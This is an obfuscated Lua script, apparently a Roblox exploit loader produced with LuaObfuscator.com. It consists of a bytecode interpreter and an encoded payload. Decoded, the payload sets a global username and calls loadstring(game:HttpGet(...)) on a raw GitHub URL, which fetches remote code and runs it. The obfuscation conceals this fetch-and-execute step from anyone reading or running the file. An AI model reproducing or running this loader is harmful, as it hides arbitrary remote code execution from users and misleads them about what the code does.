--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==4) then v13=select;v14=unpack or table.unpack ;v15=tonumber;v0=5;end if (v0==5) then v16=nil;v16=function(v17,v18,...)local v27=1;local v28;v17=v5(v4(v17,5),"..",function(v29)if (v2(v29,2)==79) then v28=v1(v4(v29,1,1));return "";else local v82=v3(v1(v29,16));if v28 then local v100=0;local v101;while true do if (v100==1) then return v101;end if (0==v100) then v101=v6(v82,v28);v28=nil;v100=1;end end else return v82;end end end);local function v30(v31,v32,v33)if v33 then local v83=(v31/((546 -(518 + 25 + 1))^(v32-(3 -2))))%(2^(((v33-(713 -(481 + 231))) -(v32-(1 + 0))) + ((1 -0) -0))) ;return v83-(v83%((2 -1) + 0)) ;else local v84=(5 -3)^(v32-((1995 -(558 + 1436)) + 0)) ;return (((v31%(v84 + v84))>=v84) and ((9 -6) -2)) or (0 -0) ;end end local function v34()local v47=0 + 0 ;local v48;while true do if (v47==(3 -2)) then return v48;end if (v47==0) then v48=v2(v17,v27,v27);v27=v27 + (1 -0) + 0 ;v47=1 -0 ;end end end local function v35()local v49=0 -0 ;local v50;local v51;while true do if (v49==(281 -(266 + 15))) then v50,v51=v2(v17,v27,v27 + (4 -2) );v27=v27 + (139 -(89 + 48)) ;v49=505 -(27 + 477) ;end if (v49==(1 + 0)) then return (v51 * (248 + 8)) + v50 ;end end end local function v36()local v52,v53,v54,v55=v2(v17,v27,v27 + ((1586 -(471 + 1107)) -5) );v27=v27 + (955 -(753 + (2133 -(911 + 1024)))) ;return (v55 * (1121655 + 11850587 + 3804974)) + (v54 * (66472 -(875 + 61))) + (v53 * (35 + 221)) + v52 ;end local function v37()local v56=393 -(205 + 188) ;local v57;local v58;local v59;local v60;local v61;local v62;while true do if (v56==3) then if (v61==(0 -0)) then if (v60==0) then return v62 * (0 + 0 + 0) ;else local v109=805 -(196 + 609) ;while true do if (v109==(0 + 0)) then v61=2 -1 ;v59=0 + 0 + 0 ;break;end end end elseif (v61==(2584 -(482 + 55))) then return ((v60==((1713 -(66 + 3)) -(953 + 691))) and (v62 * ((1 + 0)/0))) or (v62 * NaN) ;end return v9(v62,v61-(94 + 929) ) * (v59 + (v60/((1 + 1)^(118 -66)))) ;end if (v56==(1868 -(441 + 1425))) then v61=v30(v58,21,(72 + 19) -60 );v62=((v30(v58,30 + 2 )==1) and  -(1280 -(463 + (1946 -1130)))) or (205 -(66 + (284 -146))) ;v56=3;end if (v56==(0 + 0)) then v57=v36();v58=v36();v56=2 -1 ;end if (v56==((2 -1) -(1039 -(910 + 129)))) then v59=2 -1 ;v60=(v30(v58,1 + 0 ,20) * ((1561 -(1358 + 201))^(1186 -(419 + 735)))) + v57 ;v56=2;end end end local function v38(v39)local v63=1021 -(512 + 509) ;local v64;local v65;while true do if (v63==(2 -0)) then v65={};for v102=1 + 0 , #v64 do v65[v102]=v3(v2(v4(v64,v102,v102)));end v63=1653 -(849 + 801) ;end if (v63==((0 + 0) -0)) then v64=nil;if  not v39 then v39=v36();if (v39==(0 + 0)) then return "";end end v63=1 + 0 ;end if (v63==(1 + 0)) then v64=v4(v17,v27,(v27 + v39) -(1 + 0) );v27=v27 + v39 ;v63=2 + 0 ;end if (v63==(7 -(1357 -(49 + 1304)))) then return v7(v65);end end end local v40=v36;local function v41(...)return {...},v13("#",...);end local function v42()local v66=0;local v67;local v68;local v69;local v70;local v71;local v72;local v73;while true do if (v66~=(1 + 1)) then else v71=nil;v72=nil;v66=88 -(60 + 25) ;end if ((0 -0)~=v66) then else v67=0 + 0 ;v68=nil;v66=2 -1 ;end if (v66~=(1284 -(81 + 1202))) then else v69=nil;v70=nil;v66=1 + 1 ;end if ((3 + 0)==v66) then v73=nil;while true do local v104=0 -0 ;while true do if (v104~=(1 + 0)) then else if (v67~=0) then else local v110=0;local v111;while true do if (v110==(201 -(135 + 66))) then v111=1694 -(1077 + 617) ;while true do if (v111==0) then local v130=0 + 0 ;while true do if (v130~=(1 -0)) then else v111=1;break;end if (v130~=(0 -0)) then else v68={};v69={};v130=992 -(700 + 291) ;end end end if (v111~=(1 + 0)) then else v70={};v67=1 + 0 ;break;end end break;end end end if (v67==(1576 -(951 + 622))) then local v112=0 + 0 ;while true do local v115=1481 -(1387 + 94) ;while true do if ((0 -0)==v115) then if (v112~=(0 -0)) then else local v131=0 -0 ;while true do if (v131==(1 -0)) then v112=1;break;end if (v131==(0 -0)) then for v144=3 -2 ,v36() do v69[v144-(3 -2) ]=v42();end for v146=1,v36() do v70[v146]=v36();end v131=567 -(541 + 25) ;end end end if (v112==(3 -2)) then return v71;end break;end end end end break;end if (v104==(1853 -(1288 + 565))) then if (v67~=(1262 -(791 + 470))) then else local v113=0 -0 ;while true do if (v113==(1 + 0)) then v73={};v67=2;break;end if (v113==(611 -(96 + 515))) then local v127=1357 -(429 + 928) ;while true do if (v127~=(1 + 0)) then else v113=1 + 0 ;break;end if (v127==0) then v71={v68,v69,nil,v70};v72=v36();v127=1;end end end end end if (v67==(1 + 1)) then for v116=1122 -(184 + 937) ,v72 do local v117=339 -(300 + 39) ;local v118;local v119;local v120;local v121;while true do if (v117~=(1577 -(356 + 1220))) then else v120=nil;v121=nil;v117=2 + 0 ;end if (0~=v117) then else v118=1800 -(652 + 1148) ;v119=nil;v117=1 + 0 ;end if (v117==(2 -0)) then while true do if (v118==(1 + 0)) then v121=nil;while true do if (v119==(0 + 0)) then local v148=0;local v149;while true do if ((1943 -(191 + 1752))==v148) then v149=0;while true do if (v149==(0 -0)) then v120=v34();v121=nil;v149=1 + 0 ;end if (v149~=(1823 -(1762 + 60))) then else v119=1 + 0 ;break;end end break;end end end if (v119==1) then if (v120==(1 -0)) then v121=v34()~=(0 -0) ;elseif (v120==2) then v121=v37();elseif (v120==(4 -1)) then v121=v38();end v73[v116]=v121;break;end end break;end if (v118==(0 -0)) then v119=0 + 0 ;v120=nil;v118=1 + 0 ;end end break;end end end v71[3]=v34();for v122=1,v36() do local v123=0;local v124;local v125;local v126;while true do if (v123==(1832 -(653 + 1178))) then v126=nil;while true do if (v124==0) then local v132=401 -(45 + 356) ;local v133;while true do if (v132~=(0 + 0)) then else v133=1949 -(842 + 1107) ;while true do if (v133==(0 -0)) then local v175=0;while true do if (v175~=(0 + 0)) then else v125=0 -0 ;v126=nil;v175=1235 -(209 + 1025) ;end if ((227 -(115 + 111))==v175) then v133=1 -0 ;break;end end end if (v133==1) then v124=1 + 0 ;break;end end break;end end end if (v124~=(1922 -(261 + 1660))) then else while true do if (v125==(0 -0)) then v126=v34();if (v30(v126,1 + 0 ,2 -1 )==(260 -(37 + 223))) then local v164=0;local v165;local v166;local v167;local v168;local v169;local v170;while true do if (v164~=(0 -0)) then else v165=0;v166=nil;v164=2 -1 ;end if (v164==(1 + 0)) then v167=nil;v168=nil;v164=7 -5 ;end if ((2 + 0)==v164) then v169=nil;v170=nil;v164=3 -0 ;end if (v164==(1 + 2)) then while true do if (v165~=1) then else v168=nil;v169=nil;v165=1095 -(634 + 459) ;end if (v165~=(1440 -(891 + 549))) then else local v183=0 + 0 ;while true do if (v183==(1198 -(1029 + 168))) then v165=1 + 0 ;break;end if (v183==0) then v166=0 -0 ;v167=nil;v183=1 -0 ;end end end if (v165==2) then v170=nil;while true do if (v166~=(1541 -(1324 + 215))) then else while true do if (v167==(1104 -(274 + 827))) then if (v30(v169,3 + 0 ,832 -(159 + 670) )~=(1 + 0)) then else v170[6 -2 ]=v73[v170[8 -4 ]];end v68[v122]=v170;break;end if (v167==(1 + 0)) then local v194=571 -(291 + 280) ;local v195;local v196;while true do if (v194~=(226 -(17 + 209))) then else v195=0 -0 ;v196=nil;v194=1 + 0 ;end if (v194==(1 + 0)) then while true do if (v195==(0 + 0)) then v196=0;while true do if (v196~=(1 + 0)) then else v167=5 -3 ;break;end if (v196~=(0 + 0)) then else local v210=531 -(442 + 89) ;local v211;while true do if (v210~=(0 -0)) then else v211=0 + 0 ;while true do if (v211==0) then v170={v35(),v35(),nil,nil};if (v168==0) then local v216=0 + 0 ;local v217;while true do if (v216==(776 -(483 + 293))) then v217=1436 -(28 + 1408) ;while true do if (v217~=(0 -0)) then else v170[3]=v35();v170[4]=v35();break;end end break;end end elseif (v168==(1044 -(439 + 604))) then v170[6 -3 ]=v36();elseif (v168==2) then v170[9 -6 ]=v36() -((1228 -(968 + 258))^16) ;elseif (v168==(13 -10)) then local v222=0;local v223;while true do if (v222~=(0 + 0)) then else v223=0;while true do if (v223~=0) then else v170[3 + 0 ]=v36() -((3 -1)^16) ;v170[4]=v35();break;end end break;end end end v211=4 -3 ;end if (v211==(14 -(7 + 6))) then v196=1;break;end end break;end end end end break;end end break;end end end if (v167~=(2 + 0)) then else local v197=0 + 0 ;local v198;while true do if (v197==(0 + 0)) then v198=1700 -(810 + 890) ;while true do if (1~=v198) then else v167=1800 -(814 + 983) ;break;end if (v198==0) then local v208=0 + 0 ;while true do if (v208==(154 -(66 + 87))) then v198=1;break;end if ((0 + 0)~=v208) then else if (v30(v169,1,1 + 0 )==1) then v170[2]=v73[v170[1 + 1 ]];end if (v30(v169,2,586 -(504 + 80) )==(1 + 0)) then v170[3]=v73[v170[3]];end v208=1 + 0 ;end end end end break;end end end if (v167==(0 + 0)) then local v199=0;local v200;while true do if (v199==(0 + 0)) then v200=0 + 0 ;while true do if (v200==0) then local v209=0 + 0 ;while true do if (v209==(1 -0)) then v200=1;break;end if (v209==(0 -0)) then v168=v30(v126,4 -2 ,1971 -(278 + 1690) );v169=v30(v126,5 -1 ,1796 -(215 + 1575) );v209=317 -(281 + 35) ;end end end if ((1893 -(1275 + 617))==v200) then v167=1 + 0 ;break;end end break;end end end end break;end if (v166==(388 -(29 + 359))) then local v190=1419 -(821 + 598) ;while true do if (v190==1) then v166=1 + 0 ;break;end if (v190~=(0 -0)) then else v167=426 -(30 + 396) ;v168=nil;v190=3 -2 ;end end end if (v166~=(1 -0)) then else local v191=0;local v192;while true do if (v191==(1929 -(1406 + 523))) then v192=0 -0 ;while true do if (v192~=(1 + 0)) then else v166=5 -3 ;break;end if (v192~=0) then else local v207=0;while true do if (v207==(1 + 0)) then v192=844 -(192 + 651) ;break;end if (v207~=(0 -0)) then else v169=nil;v170=nil;v207=1 + 0 ;end end end end break;end end end end break;end end break;end end end break;end end break;end end break;end if (v123~=(0 + 0)) then else v124=0;v125=nil;v123=1 + 0 ;end end end v67=5 -2 ;end v104=1 -0 ;end end end break;end end end local function v43(v44,v45,v46)local v74=v44[1];local v75=v44[2];local v76=v44[3];return function(...)local v77=1;local v78= -1;local v79={...};local v80=v13("#",...) -1 ;local function v81()local v85=v74;local v86=v75;local v87=v76;local v88=v41;local v89={};local v90={};local v91={};for v95=0 + 0 ,v80 do if (((840 + 4016)==(5583 -(710 + 17))) and (v95>=v87)) then v89[v95-v87 ]=v79[v95 + (1 -0) ];else v91[v95]=v79[v95 + 1 ];end end local v92=(v80-v87) + 1 + (0 -0) ;local v93;local v94;while true do local v96=1669 -((2674 -(958 + 775)) + (1406 -678)) ;local v97;local v98;while true do if ((v96==(0 + 0)) or ((3848 -2052)>=(7512 -3494))) then v97=1977 -(888 + 1089) ;v98=nil;v96=4 -3 ;end if (((791 -(617 + 173))==v96) or ((4195 -(48 + 31))<(797 -492))) then while true do if (((0 + 0)==v97) or ((1859 + (2222 -(865 + 759)))>=(16229 -11325))) then v98=0 -0 ;while true do if (((2705 + 1169)==(9268 -5394)) and (v98==((1656 -(842 + 814)) + 0))) then local v128=0 + 0 ;local v129;while true do if (((0 -0)==v128) or ((902 + (2890 -(362 + 623)))>=(4913 -2084))) then v129=1228 -(671 + (816 -259)) ;while true do if (((13 -6)<=(124 + 120)) and (v129==(0 -0))) then local v134=491 -(63 + 428) ;while true do if (((4222 -(1244 + 720))>=(77 + (2223 -1339))) and (v134==(1 + 0))) then v129=1 + 0 ;break;end if ((v134==(946 -(881 + 65))) or ((1073 -(560 + 400))==(2288 + 86))) then v93=v85[v77];v94=v93[1 + (0 -0) ];v134=884 -(832 + 51) ;end end end if ((v129==(1714 -(1159 + 554))) or (((75 + 1666) -759)>(14033 -9451))) then v98=3 -2 ;break;end end break;end end end if (((4469 -(23 + 6))>(3163 -(97 + 1683))) and (v98==(231 -(73 + 157)))) then if ((v94<=(14 -9)) or (((3331 -(69 + 319)) + 1951)<=(2122 -(816 + 1139)))) then if (((144 -78)==((79 -27) + 14)) and (v94<=(1960 -((3433 -2214) + 739)))) then if ((v94<=(0 -0)) or ((641 + 425)>(9058 -5588))) then v91[v93[6 -4 ]]=v46[v93[13 -10 ]];elseif ((((3023 -(1385 + 287)) + 727)<=(6011 -(1039 + 226))) and (v94>(2 -1))) then v46[v93[163 -(82 + 78) ]]=v91[v93[3 -1 ]];else v91[v93[4 -2 ]]=v93[1079 -(38 + 1038) ];end elseif (((3976 -(798 + 204))<=(6806 -3084)) and (v94<=(1 + 2))) then v91[v93[2 + 0 ]]=v93[2 + 1 ]~=(339 -(314 + 25)) ;elseif ((v94>(13 -9)) or ((275 + 262)>=(2557 -(954 + (696 -(80 + 355)))))) then do return;end else for v173=v93[1 + 1 ],v93[3 + 0 ] do v91[v173]=nil;end end elseif ((v94<=((178 + 134) -(19 + 285))) or (2896>=4238)) then if ((v94<=((7 -5) + 4)) or ((1125 + (3361 -2437))==(4205 -(116 + 234)))) then local v138=0 + 0 ;local v139;local v140;local v141;local v142;local v143;while true do if (((4697 -(909 + 271))==(4993 -(849 + 627))) and (v138==(4 -2))) then v143=nil;while true do if (((1487 -361)<(12250 -9745)) and (v139==(3 -1))) then for v179=v140,v78 do local v180=1618 -((184 -61) + 1495) ;local v181;local v182;while true do if ((((5 -1) -3)==v180) or ((1447 + 3332)<=(8415 -4815))) then while true do if ((v181==(0 -0)) or ((5749 -3599)<(202 + 1213 + 472))) then v182=0 + 0 ;while true do if (((0 + 0)==v182) or (3644==(5485 -2054))) then v143=v143 + 1 + 0 ;v91[v179]=v141[v143];break;end end break;end end break;end if ((v180==(0 + 0)) or ((5707 -2517)==(2271 -1493))) then v181=0 + 0 ;v182=nil;v180=1;end end end break;end if (((9545 -4827)==(1096 + 3622)) and (v139==(1 -(1386 -(114 + 1272))))) then v78=(v142 + v140) -(3 -(1 + 1)) ;v143=0 -0 ;v139=2 -0 ;end if (((0 -0)==v139) or ((999 + 329)==(4447 -(387 + 631 + 267)))) then local v178=1752 -(647 + 178 + 927) ;while true do if (((4 -3)==v178) or ((6220 -4092)<(3005 -(1333 + 225)))) then v139=2 -1 ;break;end if (((2494 + 2091)>(1720 + 813)) and (v178==(0 + 0))) then v140=v93[(13 -7) -4 ];v141,v142=v88(v91[v140](v14(v91,v140 + 1 + 0 + 0 ,v93[(1281 -(81 + 332)) -(686 + 179) ])));v178=2 -1 ;end end end end break;end if (((2 -1)==v138) or ((9216 -5511)<=(417 -222))) then v141=nil;v142=nil;v138=2 -0 ;end if ((v138==(1475 -(61 + 1414))) or ((15740 -11555)<(1521 + 1366))) then v139=217 -(44 + 173) ;v140=nil;v138=1 + 0 ;end end elseif ((v94>((41 -23) -11)) or ((177 -(19 + 78))>=(5040 -(226 + 1001)))) then v77=v93[6 -3 ];else local v156=347 -(32 + 315) ;local v157;while true do if (((1848 -(1359 + (1800 -(918 + 596))))<=(525 + 264)) and (v156==(0 -0))) then v157=v93[256 -(111 + 143) ];v91[v157]=v91[v157](v14(v91,v157 + (1 -0) ,v78));break;end end end elseif ((v94<=(30 -21)) or ((5679 -2812)==((3828 -(127 + 1600)) + 1718))) then if (((47 + 418)<=(1913 -1148)) and (v91[v93[1 + 1 ]]==v93[13 -9 ])) then v77=v77 + 1 ;else v77=v93[4 -1 ];end elseif ((((930 + 1077) -(1245 + 663))<=(3266 -(1049 + 579))) and (v94==(19 -9))) then v91[v93[1 + 1 ]]();else local v159=(882 + 624) -(1269 + 237) ;local v160;local v161;local v162;local v163;while true do if ((3770>=((879 + 420) -(267 + (917 -(630 + 184))))) and (v159==(4 -2))) then while true do if ((v160==(0 + 0)) or ((4140 -(646 + (2001 -(487 + 244))))>(5270 -(413 + 308)))) then v161=0 + (0 -0) ;v162=nil;v160=1959 -(1816 + 142) ;end if (((543 + 673)>=(56 -24)) and ((1705 -(906 + 798))==v160)) then v163=nil;while true do if ((((9033 -5868) -(730 + 830))>((1383 -(899 + 94)) + 880)) and (v161==1)) then v91[v162 + (1497 -(410 + 1086)) ]=v163;v91[v162]=v163[v93[11 -7 ]];break;end if ((0==v161) or ((2 + 19)>=(33 + 2369))) then local v188=0 + (1458 -(575 + 883)) ;local v189;while true do if (((2333 -(967 + 676))<(1874 + 2204)) and (v188==(0 + 0))) then v189=1517 -(1389 + 128) ;while true do if ((v189==(2 -1)) or ((4783 -(1518 + 377))<(288 + 468))) then v161=1 + 0 ;break;end if (((170 -60)<=(2089 + 75)) and (v189==(1666 -(686 + 329 + 651)))) then v162=v93[1616 -(268 + 1346) ];v163=v91[v93[1507 -(330 + (3169 -(346 + 1649))) ]];v189=1 + 0 + 0 ;end end break;end end end end break;end end break;end if (((1266 -(1247 + 19))==v159) or ((1222 -490)>(4184 -(629 + 204)))) then v160=0 -0 ;v161=nil;v159=625 -(475 + 149) ;end if (((1 + 0)==v159) or (4520<=(2106 -((3176 -(1201 + 460)) + 429)))) then v162=nil;v163=nil;v159=2 + 0 ;end end end v77=v77 + (519 -(513 + 5)) + 0 ;break;end end break;end end break;end end end end A,B=v41(v12(v81));if  not A[1] then local v99=v44[4][v77] or "?" ;error("Script error at ["   .. v99   .. "]:"   .. A[2] );else return v14(A,2,B);end end;end return v43(v42(),{},v18)(...);end;v16("LOL!073O00028O0003083O00557365724E616D6503083O00796F77696D707230030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403323O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F507378302F412F6D61696E2F6D61696E00163O0012013O00014O0004000100013O0026093O0002000100010004083O00020001001201000100013O00260900010005000100010004083O00050001001201000200033O001202000200023O00122O000200043O00122O000300053O00200B000300030006001201000500074O0003000600014O0006000300064O000700023O00022O000A0002000100010004083O001500010004083O000500010004083O001500010004083O000200012O00053O00017O00163O00023O00033O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O000F3O00113O00",v10(),...);break;end if (v0==1) then v4=string.sub;v5=string.gsub;v6=string.rep;v0=2;end if (v0==2) then v7=table.concat;v8=table.insert;v9=math.ldexp;v0=3;end if (0==v0) then v1=tonumber;v2=string.byte;v3=string.char;v0=1;end if (v0==3) then v10=getfenv or function()return _ENV;end ;v11=setmetatable;v12=pcall;v0=4;end end end
